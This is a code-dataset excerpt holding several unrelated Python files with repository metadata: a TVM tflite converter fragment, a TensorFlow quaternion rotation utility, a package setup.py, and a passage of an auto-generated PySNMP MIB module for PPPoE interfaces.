# SAME padding: https://www.tensorflow.org/api_guides/python/nn
def get_pad_value(data, kernel, stride):
    """Get the pad tuple of value for SAME padding

    Parameters
    ----------
    data:
        1D input data
    kernel:
        1D input kernel
    stride:
        1D input stride

    Returns
    -------
    pad tuple of value
    """
    # SAME padding: output covers ceil(data / stride) positions, and any odd
    # leftover padding goes to the trailing side.
    out_size = int(math.ceil(float(data) / float(stride)))
    total_pad = max(0, (out_size - 1) * stride + kernel - data)
    before = total_pad // 2
    return before, total_pad - before
def get_tensor_name(subgraph, tensor_idx):
    """Get the tensor name.

    Parameters
    ----------
    subgraph:
        tflite.Subgraph.Subgraph
    tensor_idx:
        tensor index in subgraph

    Returns
    -------
    tensor name in UTF-8 encoding
    """
    raw_name = subgraph.Tensors(tensor_idx).Name()
    return raw_name.decode("utf-8")
def from_tflite(model, shape_dict, dtype_dict):
    """Convert a tflite model into a compatible relay Function.

    Parameters
    ----------
    model:
        tflite.Model.Model
    shape_dict : dict of str to int list/tuple
        Input shapes of the model; inputs not listed get shape None.
    dtype_dict : dict of str to str
        Input types of the model; inputs not listed default to "float32".

    Returns
    -------
    mod : tvm.relay.Module
        The relay module for compilation.
    params : dict of str to tvm.NDArray
        The parameter dict to be used by relay.
    """
    try:
        import tflite.Model
        import tflite.SubGraph
        import tflite.BuiltinOperator
    except ImportError:
        raise ImportError("The tflite package must be installed")
    assert isinstance(model, tflite.Model.Model)
    # keep the same as tflite
    assert model.SubgraphsLength() == 1, "only support one subgraph (main subgraph)"
    subgraph = model.Subgraphs(0)
    # Seed the expression table with one relay var per model input.
    exp_tab = ExprTable()
    for input_idx in subgraph.InputsAsNumpy():
        name = get_tensor_name(subgraph, input_idx)
        exp_tab.set_expr(
            name,
            _expr.var(name,
                      shape=shape_dict.get(name),
                      dtype=dtype_dict.get(name, "float32")))
    # Translate every op in the subgraph into relay expressions.
    op_converter = OperatorConverter(model, subgraph, exp_tab)
    op_converter.check_unsupported_ops()
    op_converter.convert_op_to_relay()
    # Collect constant parameters and wire up the model outputs.
    params = {name: _nd.array(np.array(value))
              for name, value in exp_tab.params.items()}
    output_exprs = [exp_tab.get_expr(get_tensor_name(subgraph, idx))
                    for idx in subgraph.OutputsAsNumpy()]
    outputs = output_exprs[0] if len(output_exprs) == 1 else _expr.Tuple(output_exprs)
    func = _expr.Function(ir_pass.free_vars(outputs), outputs)
    return _module.Module.from_expr(func), params
| 40.791523 | 99 | 0.655444 |
acfa956ad21a59fa775c07f29c720cd610ba3027 | 5,995 | py | Python | 2Dpm/util/quaternion.py | Sirish07/2D_projection_matching | 11c8ea81e3cbf5ecd3daba602cde0b7a9efcc15d | [
"MIT"
] | 153 | 2018-11-26T18:35:25.000Z | 2022-03-25T07:34:17.000Z | 2Dpm/util/quaternion.py | Sirish07/2D_projection_matching | 11c8ea81e3cbf5ecd3daba602cde0b7a9efcc15d | [
"MIT"
] | 10 | 2019-04-24T09:56:27.000Z | 2021-03-29T13:36:19.000Z | 2Dpm/util/quaternion.py | Sirish07/2D_projection_matching | 11c8ea81e3cbf5ecd3daba602cde0b7a9efcc15d | [
"MIT"
] | 16 | 2019-01-23T15:23:53.000Z | 2021-12-08T21:27:44.000Z | # Copyright Philipp Jund (jundp@cs.uni-freiburg.de) and Eldar Insafutdinov, 2018.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Website: https://github.com/PhilJd/tf-quaternion
import tensorflow as tf
import numpy as np
def validate_shape(x):
    """Raise a ValueError if x.shape is not (..., 4)."""
    # The check runs at graph-construction time. If the last dimension is
    # statically unknown, tf.reshape(x, (-1, 4)) upstream might work.
    if x.shape[-1] != 4:
        raise ValueError(
            "Can't create a quaternion from a tensor with shape {}."
            "The last dimension must be 4.".format(x.shape))
def vector3d_to_quaternion(x):
    """Convert a tensor of 3D vectors to a quaternion.

    Prepends a 0 to the last dimension, i.e. [[1,2,3]] -> [[0,1,2,3]].

    Args:
        x: A `tf.Tensor` of rank R; the last dimension must be 3.
    Returns:
        A tensor of rank R whose last dimension is 4.
    Raises:
        ValueError, if the last dimension of x is not 3.
    """
    x = tf.convert_to_tensor(x)
    if x.shape[-1] != 3:
        raise ValueError("The last dimension of x must be 3.")
    # Pad one zero onto the *front* of the last axis only; all other axes
    # are left untouched.
    paddings = (len(x.shape) - 1) * [[0, 0]] + [[1, 0]]
    return tf.pad(x, paddings)
def _prepare_tensor_for_div_mul(x):
    """Prepare the tensor x for quaternion division/multiplication.

    This function
    a) converts x to a tensor if necessary,
    b) promotes a 3D vector to a pure quaternion (prepends w=0) if the
       last dimension is 3,
    c) validates that the result has a last dimension of 4.
    """
    tensor = tf.convert_to_tensor(x)
    if tensor.shape[-1] == 3:
        tensor = vector3d_to_quaternion(tensor)
    validate_shape(tensor)
    return tensor
def quaternion_multiply(a, b):
    """Multiply two quaternion tensors (Hamilton product).

    Note that this differs from tf.multiply (element-wise) and is not
    commutative. Inputs with a last dimension of 3 are first promoted to
    pure quaternions (w=0) by _prepare_tensor_for_div_mul.

    Args:
        a, b: A `tf.Tensor` with shape (..., 4) or (..., 3).
    Returns:
        A tensor with shape (..., 4) holding the product a*b.
    """
    a = _prepare_tensor_for_div_mul(a)
    b = _prepare_tensor_for_div_mul(b)
    w1, x1, y1, z1 = tf.unstack(a, axis=-1)
    w2, x2, y2, z2 = tf.unstack(b, axis=-1)
    # Standard Hamilton product component formulas.
    w = w1 * w2 - x1 * x2 - y1 * y2 - z1 * z2
    x = w1 * x2 + x1 * w2 + y1 * z2 - z1 * y2
    y = w1 * y2 + y1 * w2 + z1 * x2 - x1 * z2
    z = w1 * z2 + z1 * w2 + x1 * y2 - y1 * x2
    return tf.stack((w, x, y, z), axis=-1)
def quaternion_conjugate(q):
    """Compute the conjugate of q, i.e. [q.w, -q.x, -q.y, -q.z]."""
    # Flip the sign of the vector part; the scalar part is unchanged.
    signs = [1.0, -1.0, -1.0, -1.0]
    return tf.multiply(q, signs)
def quaternion_normalise(q):
    """Normalise a quaternion for use as a rotation quaternion.

    Args:
        q: [..., 4] quaternion
    Returns:
        q / ||q||_2
    """
    norm = tf.norm(q, axis=-1, keepdims=True)
    return q / norm
def quaternion_rotate(pc, q, inverse=False):
    """Rotate a batch of 3D point sets by per-batch quaternions.

    Computes the sandwich product q * pc * q' (or q' * pc * q when
    ``inverse`` is True, i.e. the inverse rotation). The 3D points are
    promoted to pure quaternions inside quaternion_multiply.

    Args:
        pc: [B,N,3] point cloud
        q: [B,4] rotation quaternion; it is normalised here, so it need
            not be unit length on input.
        inverse: apply the inverse rotation when True.
    Returns:
        [B,N,3] rotated points
    """
    # Normalise q so the sandwich product is a pure rotation (no scaling).
    q_norm = tf.expand_dims(tf.norm(q, axis=-1), axis=-1)
    q /= q_norm
    q = tf.expand_dims(q, axis=1)  # [B,1,4], broadcasts across the N points
    q_ = quaternion_conjugate(q)
    qmul = quaternion_multiply
    if not inverse:
        wxyz = qmul(qmul(q, pc), q_)  # [B,N,4]
    else:
        wxyz = qmul(qmul(q_, pc), q)  # [B,N,4]
    # Workaround: with batch size 1 the result loses its batch dimension
    # ("bug with batch size of 1" per the original author); restore it.
    if len(wxyz.shape) == 2:
        wxyz = tf.expand_dims(wxyz, axis=0)
    xyz = wxyz[:, :, 1:4]  # drop the (zero) scalar part -> [B,N,3]
    return xyz
def normalized(q):
    """Return q scaled to unit L2 norm along the last axis."""
    return q / tf.expand_dims(tf.norm(q, axis=-1), axis=-1)
def as_rotation_matrix(q):
    """Calculate the rotation matrix corresponding to quaternion q.

    See
    http://www.euclideanspace.com/maths/geometry/rotations/conversions/quaternionToMatrix/

    Returns:
        A `tf.Tensor` with R+1 dimensions and
        shape [d_1, ..., d_(R-1), 3, 3], the rotation matrix
    """
    # helper functions for the three kinds of matrix entries
    def diag(a, b): # computes the diagonal entries, 1 - 2*a**2 - 2*b**2
        return 1 - 2 * tf.pow(a, 2) - 2 * tf.pow(b, 2)
    def tr_add(a, b, c, d): # computes triangle entries with addition
        return 2 * a * b + 2 * c * d
    def tr_sub(a, b, c, d): # computes triangle entries with subtraction
        return 2 * a * b - 2 * c * d
    # Normalise first so the resulting matrix is orthonormal even if q
    # is not unit length.
    w, x, y, z = tf.unstack(normalized(q), axis=-1)
    m = [[diag(y, z), tr_sub(x, y, z, w), tr_add(x, z, y, w)],
         [tr_add(x, y, z, w), diag(x, z), tr_sub(y, z, x, w)],
         [tr_sub(x, z, y, w), tr_add(y, z, x, w), diag(x, y)]]
    # Stack columns (axis=-1) then rows (axis=-2) to form the 3x3 matrix.
    return tf.stack([tf.stack(m[i], axis=-1) for i in range(3)], axis=-2)
def from_rotation_matrix(mtr):
    """Convert a rotation matrix to a quaternion (w, x, y, z).

    See
    http://www.euclideanspace.com/maths/geometry/rotations/conversions/matrixToQuaternion/

    NOTE(review): only the w-major branch of the conversion is implemented,
    so this divides by 4*w and presumably assumes rotations far from 180
    degrees (where w -> 0) -- confirm against callers.
    """
    mtr = tf.convert_to_tensor(mtr)
    def m(j, i):
        # Extract the scalar entry [j, i] of the trailing 3x3 dimensions,
        # keeping any leading batch dimensions intact.
        shape = mtr.shape.as_list()
        begin = [0 for _ in range(len(shape))]
        begin[-2] = j
        begin[-1] = i
        size = [s for s in shape]
        size[-2] = 1
        size[-1] = 1
        v = tf.slice(mtr, begin=begin, size=size)
        v = tf.squeeze(v, axis=[-1, -2])
        return v
    # w from the trace; the vector part from antisymmetric differences.
    w = tf.sqrt(1.0 + m(0, 0) + m(1, 1) + m(2, 2)) / 2
    x = (m(2, 1) - m(1, 2)) / (4 * w)
    y = (m(0, 2) - m(2, 0)) / (4 * w)
    z = (m(1, 0) - m(0, 1)) / (4 * w)
    q = tf.stack([w, x, y, z], axis=-1)
    return q
def quaternion_multiply_np(a, b):
    """Hamilton product of two quaternions given as (w, x, y, z) sequences.

    NumPy counterpart of quaternion_multiply; not commutative.

    Returns:
        np.ndarray of shape (4,) holding a*b in (w, x, y, z) order.
    """
    aw, ax, ay, az = a
    bw, bx, by, bz = b
    return np.array([
        aw * bw - ax * bx - ay * by - az * bz,
        aw * bx + ax * bw + ay * bz - az * by,
        aw * by + ay * bw + az * bx - ax * bz,
        aw * bz + az * bw + ax * by - ay * bx,
    ])
acfa9618263bdbfeaf6b9f106f6d545248a3a765 | 759 | py | Python | setup.py | pywebdata/pywebdata | 74fb3d5adcdb549008ee04de5ae284066c0db362 | [
"MIT"
] | null | null | null | setup.py | pywebdata/pywebdata | 74fb3d5adcdb549008ee04de5ae284066c0db362 | [
"MIT"
] | 8 | 2015-09-07T17:48:15.000Z | 2016-01-31T19:56:28.000Z | setup.py | pywebdata/pywebdata | 74fb3d5adcdb549008ee04de5ae284066c0db362 | [
"MIT"
] | null | null | null | from setuptools import setup, find_packages
def readme():
    """Return the contents of README.rst for use as the long description.

    Raises:
        IOError: if README.rst is missing from the working directory.
    """
    # Use a context manager so the file handle is closed deterministically;
    # the original relied on the garbage collector to close it.
    with open('README.rst') as f:
        return f.read()
# Package metadata for distribution; long_description is read from README.rst.
setup(
    name='pywebdata',
    version='0.1.0',
    description="all the web's data, one api",
    long_description=readme(),
    url='http://github.com/drousis/pywebdata',
    author='Damon Rousis',
    author_email='admin@damonology.com',
    license='MIT',
    classifiers=[
        'Development Status :: 3 - Alpha',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python :: 2.7'
    ],
    # Discover all packages automatically; ship the services README as data.
    packages=find_packages(),
    package_data={
        'pywebdata': ['services/README']
    },
    install_requires=['requests'],
    zip_safe=False,
    # Tests are run via nose (legacy test runner).
    test_suite='nose.collector',
    tests_require=['nose']
)
acfa976ee1e91c4c150ae7703469a144b772d3d4 | 29,040 | py | Python | pysnmp/Unisphere-Data-PPPOE-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 11 | 2021-02-02T16:27:16.000Z | 2021-08-31T06:22:49.000Z | pysnmp/Unisphere-Data-PPPOE-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 75 | 2021-02-24T17:30:31.000Z | 2021-12-08T00:01:18.000Z | pysnmp/Unisphere-Data-PPPOE-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module Unisphere-Data-PPPOE-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/Unisphere-Data-PPPOE-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 21:25:13 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
ObjectIdentifier, Integer, OctetString = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "Integer", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsUnion, ValueRangeConstraint, ConstraintsIntersection, SingleValueConstraint, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsUnion", "ValueRangeConstraint", "ConstraintsIntersection", "SingleValueConstraint", "ValueSizeConstraint")
InterfaceIndexOrZero, InterfaceIndex = mibBuilder.importSymbols("IF-MIB", "InterfaceIndexOrZero", "InterfaceIndex")
ModuleCompliance, NotificationGroup, ObjectGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup", "ObjectGroup")
TimeTicks, MibScalar, MibTable, MibTableRow, MibTableColumn, Bits, IpAddress, Integer32, Counter32, ObjectIdentity, ModuleIdentity, iso, Counter64, MibIdentifier, Unsigned32, Gauge32, NotificationType = mibBuilder.importSymbols("SNMPv2-SMI", "TimeTicks", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Bits", "IpAddress", "Integer32", "Counter32", "ObjectIdentity", "ModuleIdentity", "iso", "Counter64", "MibIdentifier", "Unsigned32", "Gauge32", "NotificationType")
DisplayString, RowStatus, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "RowStatus", "TextualConvention")
usDataMibs, = mibBuilder.importSymbols("Unisphere-Data-MIBs", "usDataMibs")
UsdNextIfIndex, UsdEnable = mibBuilder.importSymbols("Unisphere-Data-TC", "UsdNextIfIndex", "UsdEnable")
usdPPPoEMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18))
usdPPPoEMIB.setRevisions(('2002-08-16 21:46', '2001-06-19 14:27', '2001-03-21 15:00', '2001-02-12 00:00', '2000-10-25 00:00', '1999-05-13 00:00',))
if mibBuilder.loadTexts: usdPPPoEMIB.setLastUpdated('200208162146Z')
if mibBuilder.loadTexts: usdPPPoEMIB.setOrganization('Juniper Networks, Inc.')
usdPPPoEObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1))
usdPPPoEIfLayer = MibIdentifier((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1))
usdPPPoESubIfLayer = MibIdentifier((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 2))
usdPPPoEGlobal = MibIdentifier((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 3))
usdPPPoEProfile = MibIdentifier((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 4))
usdPPPoESummary = MibIdentifier((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 5))
usdPPPoENextIfIndex = MibScalar((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 1), UsdNextIfIndex()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoENextIfIndex.setStatus('current')
usdPPPoEIfTable = MibTable((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 2), )
if mibBuilder.loadTexts: usdPPPoEIfTable.setStatus('current')
usdPPPoEIfEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 2, 1), ).setIndexNames((0, "Unisphere-Data-PPPOE-MIB", "usdPPPoEIfIfIndex"))
if mibBuilder.loadTexts: usdPPPoEIfEntry.setStatus('current')
usdPPPoEIfIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 2, 1, 1), InterfaceIndex()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoEIfIfIndex.setStatus('current')
usdPPPoEIfMaxNumSessions = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 2, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65335))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: usdPPPoEIfMaxNumSessions.setStatus('current')
usdPPPoEIfRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 2, 1, 3), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: usdPPPoEIfRowStatus.setStatus('current')
usdPPPoEIfLowerIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 2, 1, 4), InterfaceIndexOrZero()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: usdPPPoEIfLowerIfIndex.setStatus('current')
usdPPPoEIfAcName = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 2, 1, 5), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 64))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: usdPPPoEIfAcName.setStatus('current')
usdPPPoEIfDupProtect = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 2, 1, 6), UsdEnable().clone('disable')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: usdPPPoEIfDupProtect.setStatus('current')
usdPPPoEIfPADIFlag = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 2, 1, 7), UsdEnable().clone('disable')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: usdPPPoEIfPADIFlag.setStatus('current')
usdPPPoEIfAutoconfig = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 2, 1, 8), UsdEnable().clone('disable')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: usdPPPoEIfAutoconfig.setStatus('current')
usdPPPoEIfStatsTable = MibTable((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 3), )
if mibBuilder.loadTexts: usdPPPoEIfStatsTable.setStatus('current')
usdPPPoEIfStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 3, 1), ).setIndexNames((0, "Unisphere-Data-PPPOE-MIB", "usdPPPoEIfIfIndex"))
if mibBuilder.loadTexts: usdPPPoEIfStatsEntry.setStatus('current')
usdPPPoEIfStatsRxPADI = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 3, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoEIfStatsRxPADI.setStatus('current')
usdPPPoEIfStatsTxPADO = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 3, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoEIfStatsTxPADO.setStatus('current')
usdPPPoEIfStatsRxPADR = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 3, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoEIfStatsRxPADR.setStatus('current')
usdPPPoEIfStatsTxPADS = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 3, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoEIfStatsTxPADS.setStatus('current')
usdPPPoEIfStatsRxPADT = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 3, 1, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoEIfStatsRxPADT.setStatus('current')
usdPPPoEIfStatsTxPADT = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 3, 1, 6), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoEIfStatsTxPADT.setStatus('current')
usdPPPoEIfStatsRxInvVersion = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 3, 1, 7), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoEIfStatsRxInvVersion.setStatus('current')
usdPPPoEIfStatsRxInvCode = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 3, 1, 8), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoEIfStatsRxInvCode.setStatus('current')
usdPPPoEIfStatsRxInvTags = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 3, 1, 9), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoEIfStatsRxInvTags.setStatus('current')
usdPPPoEIfStatsRxInvSession = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 3, 1, 10), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoEIfStatsRxInvSession.setStatus('current')
usdPPPoEIfStatsRxInvTypes = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 3, 1, 11), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoEIfStatsRxInvTypes.setStatus('current')
usdPPPoEIfStatsRxInvPackets = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 3, 1, 12), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoEIfStatsRxInvPackets.setStatus('current')
usdPPPoEIfStatsRxInsufficientResources = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 3, 1, 13), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoEIfStatsRxInsufficientResources.setStatus('current')
usdPPPoEIfStatsTxPADM = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 3, 1, 14), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoEIfStatsTxPADM.setStatus('current')
usdPPPoESubIfNextIfIndex = MibScalar((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 2, 1), UsdNextIfIndex()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoESubIfNextIfIndex.setStatus('current')
usdPPPoESubIfTable = MibTable((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 2, 2), )
if mibBuilder.loadTexts: usdPPPoESubIfTable.setStatus('current')
usdPPPoESubIfEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 2, 2, 1), ).setIndexNames((0, "Unisphere-Data-PPPOE-MIB", "usdPPPoESubIfIndex"))
if mibBuilder.loadTexts: usdPPPoESubIfEntry.setStatus('current')
usdPPPoESubIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 2, 2, 1, 1), InterfaceIndex())
if mibBuilder.loadTexts: usdPPPoESubIfIndex.setStatus('current')
usdPPPoESubIfRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 2, 2, 1, 2), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: usdPPPoESubIfRowStatus.setStatus('current')
usdPPPoESubIfLowerIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 2, 2, 1, 3), InterfaceIndexOrZero()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: usdPPPoESubIfLowerIfIndex.setStatus('current')
usdPPPoESubIfId = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 2, 2, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1, 2147483647)).clone(-1)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: usdPPPoESubIfId.setStatus('current')
usdPPPoESubIfSessionId = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 2, 2, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoESubIfSessionId.setStatus('current')
usdPPPoESubIfMotm = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 2, 2, 1, 6), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 127))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: usdPPPoESubIfMotm.setStatus('current')
usdPPPoESubIfUrl = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 2, 2, 1, 7), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 127))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: usdPPPoESubIfUrl.setStatus('current')
usdPPPoEGlobalMotm = MibScalar((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 3, 1), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 127))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: usdPPPoEGlobalMotm.setStatus('current')
usdPPPoEProfileTable = MibTable((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 4, 1), )
if mibBuilder.loadTexts: usdPPPoEProfileTable.setStatus('deprecated')
usdPPPoEProfileEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 4, 1, 1), ).setIndexNames((0, "Unisphere-Data-PPPOE-MIB", "usdPPPoEProfileIndex"))
if mibBuilder.loadTexts: usdPPPoEProfileEntry.setStatus('deprecated')
usdPPPoEProfileIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 4, 1, 1, 1), Unsigned32())
if mibBuilder.loadTexts: usdPPPoEProfileIndex.setStatus('deprecated')
usdPPPoEProfileRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 4, 1, 1, 2), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: usdPPPoEProfileRowStatus.setStatus('deprecated')
usdPPPoEProfileMotm = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 4, 1, 1, 3), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 127))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: usdPPPoEProfileMotm.setStatus('deprecated')
usdPPPoEProfileUrl = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 4, 1, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 127))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: usdPPPoEProfileUrl.setStatus('deprecated')
usdPPPoEMajorInterfaceCount = MibScalar((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 5, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoEMajorInterfaceCount.setStatus('current')
usdPPPoESummaryMajorIfAdminUp = MibScalar((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 5, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoESummaryMajorIfAdminUp.setStatus('current')
usdPPPoESummaryMajorIfAdminDown = MibScalar((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 5, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoESummaryMajorIfAdminDown.setStatus('current')
usdPPPoESummaryMajorIfOperUp = MibScalar((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 5, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoESummaryMajorIfOperUp.setStatus('current')
usdPPPoESummaryMajorIfOperDown = MibScalar((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 5, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoESummaryMajorIfOperDown.setStatus('current')
usdPPPoESummaryMajorIfLowerLayerDown = MibScalar((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 5, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoESummaryMajorIfLowerLayerDown.setStatus('current')
usdPPPoESummaryMajorIfNotPresent = MibScalar((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 5, 7), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoESummaryMajorIfNotPresent.setStatus('current')
usdPPPoESummarySubInterfaceCount = MibScalar((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 5, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoESummarySubInterfaceCount.setStatus('current')
